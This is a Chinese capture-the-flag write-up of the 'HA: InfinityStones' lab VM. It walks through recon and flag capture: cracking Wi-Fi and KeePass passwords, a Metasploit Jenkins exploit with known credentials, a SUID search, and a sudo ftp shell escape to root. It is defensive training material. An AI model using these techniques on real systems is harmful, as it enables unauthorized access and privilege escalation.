日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 人文社科 > 生活经验 >内容正文

生活经验

HA: InfinityStones靶机渗透测试

發(fā)布時間:2023/11/28 生活经验 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 HA: InfinityStones靶机渗透测试 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

      • 靶機信息
      • 一、信息收集
          • 1.主機發(fā)現
          • 2.端口掃描
          • 3.目錄掃描
      • 二、漏洞挖掘
          • 1.訪問 192.168.1.108
          • 2.訪問 /img 目錄
          • 3.訪問 https 服務(443)端口
          • 4.查看 /wifi/ 路徑
          • 5.訪問 /aether.php 頁面
          • 6.訪問 8080 端口
          • 7.ssh 登陸 morag 賬戶

靶機信息

滅霸認為,如果他殺死了宇宙中所有生命的一半,將恢復平衡。
為此,他需要所有六塊無限寶石來驅動無限手套,這反過來又使他能夠彎曲時間,空間,能量以及物理和現實定律。
但是這次復仇者聯(lián)盟比滅霸領先一步。
復仇者聯(lián)盟在這個CTF中隱藏了所有無限寶石。
幫助滅霸獲得所有無限寶石并恢復宇宙的平衡。該機器包含6種帶有6種不同標志的無限寶石來測試您的技能,找出它們。

簡單來說就是有6個flag,拿到它

一、信息收集

1.主機發(fā)現
arp-scan -l

2.端口掃描
nmap -A -p- 192.168.1.108


發(fā)現開放了 22 ssh 服務;80 apache;443 ssl;8080 jetty 框架

3.目錄掃描
dirb http://192.168.1.108


發(fā)現三個目錄

二、漏洞挖掘

1.訪問 192.168.1.108


訪問主頁發(fā)現寶石圖片切換及靶機信息和復聯(lián)任務圖片

2.訪問 /img 目錄


將圖片保存到電腦,查看信息

exiftool space.jpg


得到 SPACESTONE

SPACESTONE:{74E57403424607145B9B77809DEB49D0}
3.訪問 https 服務(443)端口
https://192.168.1.108/

查看證書
查看更多信息

得到 MINDSTONE

MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
4.查看 /wifi/ 路徑


發(fā)現兩個文件,下載文件并查看
發(fā)現流量文件是 wifi 數據包,
發(fā)現 pwd.txt 文件是密碼構成:

gam 開頭
一個大寫字母
2個數字
2個小寫字母
復聯(lián)第一次上映年份(這里影院寫成了威脅)

1)生成字典

crunch 12 12 -t gam,%%@@2012 -o dict.txt

2)查找 wifi-key

aircrack-ng -w ./dict.txt /root/Downloads/reality.cap


發(fā)現密碼是 gamA00fe2012
3)訪問 http://192.168.1.108/gamA00fe2012/
得到 REALITYSTONE

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
5.訪問 /aether.php 頁面



發(fā)現 8 個問題,正確解答并轉為二進制得到 01101001
1)訪問 /01101001/ 路徑

http://192.168.1.108/01101001/


發(fā)現 hints.txt,查看發(fā)現是 Brainfuck 編碼
在 https://www.splitbrain.org/services/ook 解碼得到 admin:avengers

6.訪問 8080 端口


發(fā)現 jenkins 框架
1)使用 msfconsole 對其進行滲透

msfconsole
search jenkins
use 11

set target 1    #設置目標系統(tǒng)類型
show payloads    #查看可用payload
set payload 14    #選擇對應payload
set rhosts 192.168.1.108    #設置靶機ip
set rport 8080    #設置端口
set  targeturi /    #設置路徑
set username admin    #設置用戶名
set password avengers    #設置密碼
run    #開始利用



得到 meterpreter shell
2)get 新 shell

shell

3)嘗試 suid 提權

find / -perm -u=s -type f 2>/dev/null

發(fā)現 /opt/script 文件
4)使用 python3 get 交互 shell,查看所有用戶,執(zhí)行 script

python3 -c "import pty;pty.spawn('/bin/bash')"
/opt/script



發(fā)現 morag、stones 賬戶
得到 TIMESTONE

TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

5)查看 /opt/ 目錄下所有文件

cd /opt
ls


發(fā)現 morag.kdbx 文件
6)使用 meterpreter shell 獲取文件

meterpreter > download /opt/mor*



7)執(zhí)行 morag.kdbx

apt-get install keepassx    #安裝keepassx
keepassx ./morag.kdbx


執(zhí)行發(fā)現需要密碼

8)破解密碼

keepass2john morag.kdbx > morag.hash
john morag.hash


得到密碼 princesa,輸入


打開后發(fā)現有 flag 字樣,雙擊右邊的 power stone 查看其值

得到 POWERSTONE

POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}

打開 creds 列,發(fā)現疑似 base64 代碼,嘗試解密

echo 'bW9yYWc6eW9uZHU=' | base64 -d


發(fā)現是 morag 賬戶的密碼

7.ssh 登陸 morag 賬戶

因為我們已知靶機開放了 ssh 所以我們直接登陸即可

ssh morag@192.168.1.108
yondu


接著常規(guī)操作 sudo 提權

sudo -l
sudo ftp
!/bin/bash    # !表示在ftp中執(zhí)行系統(tǒng)命令并返回
cd /root
cat f*



得到 SOULSTONE

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

至此,六個 flag 全部集齊

總結

以上是生活随笔為你收集整理的HA: InfinityStones靶机渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。